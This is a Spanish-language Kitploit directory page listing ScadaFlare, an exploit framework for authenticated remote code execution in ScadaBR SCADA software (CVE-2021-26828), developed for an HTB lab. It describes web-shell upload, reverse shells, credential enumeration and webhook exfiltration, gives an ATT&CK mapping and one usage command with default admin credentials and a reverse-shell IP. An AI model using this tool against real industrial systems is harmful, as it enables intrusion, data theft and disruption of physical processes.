Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare Framework de explotación RCE autenticado para ScadaBR (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
Herramientas/GitHubGitHub/ridpath/cve-2021-26828-ultimate
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónSeguridad SCADA/ICSExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y ControlRed Teaming
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

528hace 10 mesesAún no revisado

ScadaFlare Framework de explotación RCE autenticado para ScadaBR (CVE-2021-26828) OpenPLC ScadaBR

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ScadaFlare - Kit de explotación de RCE autenticado CVE-2021-26828

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

Exploit modular de RCE post-autenticación dirigido a ScadaBR <1.1.0, mejorado para operaciones de red team.

ScadaFlare Demo

Características

  • Sube una shell .jsp armada a través de view_edit.shtm
  • Compatible con payloads de Linux y Windows
  • Soporte de proxy SOCKS5 / HTTP
  • Disparador de reverse shell (estándar o base64)
  • Módulos de enumeración (BD, credenciales, Log4Shell, etc.)
  • Exfiltración por webhook (Slack / Discord)
  • Generación de scripts de recursos de Metasploit
  • Soporte de limpieza (kill switch)

Mapeo de Técnicas MITRE ATT&CK

FaseTécnicaID
Acceso inicial (post-autenticación)Cuentas válidasT1078
EjecuciónExplotación de aplicación expuesta al públicoT1190
Ejecución de comandosWeb ShellT1505.003
Acciones de privilegiosModificar contenido webT1505
Acceso a credencialesCredenciales en archivos de configuraciónT1552.001
DescubrimientoDescubrimiento remoto de sistemasT1018
ExfiltraciónExfiltración a través de servicio webT1567.002
Evasión de defensasProxy y tunelización de protocoloT1090

CVE

  • CVE-2021-26828
  • Descubierto por Fellipe Oliveira
  • Exploit mejorado y modularizado

Por Qué Existe

Este exploit se desarrolló durante el análisis del escenario HTB Pro Lab: Alchemy. El PoC original de Fellipe Oliveira era sólido, pero:

  • Estaba escrito en Python 2
  • Carecía de funciones modernas como soporte de proxy, limpieza de shell y encadenamiento de enumeración
  • Era difícil de ampliar o integrar en flujos de trabajo de red team

Esta versión, ScadaFlare, es una reescritura completa en Python 3 con soporte modular, múltiples estrategias de evasión, anulación de la detección de SO, integración de webhooks, soporte de proxy SOCKS y cadenas de enumeración para uso operativo en el mundo real.

Uso

python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

Solo Uso Legal y Ético

ScadaFlare está diseñado únicamente para:

  • Educación en hacking ético
  • Pruebas en laboratorio SCADA
  • Investigación defensiva y validación de vulnerabilidades

El uso no autorizado contra sistemas industriales reales puede:

  • Interrumpir procesos físicos
  • Causar daños o riesgos de seguridad
  • Conllevar graves consecuencias legales

Al usar esta herramienta aceptas toda la responsabilidad de:

  • Obtener autorización explícita por escrito
  • Operar únicamente en entornos aprobados

Licencia

Licencia MIT – consulta LICENSE

Descargar herramienta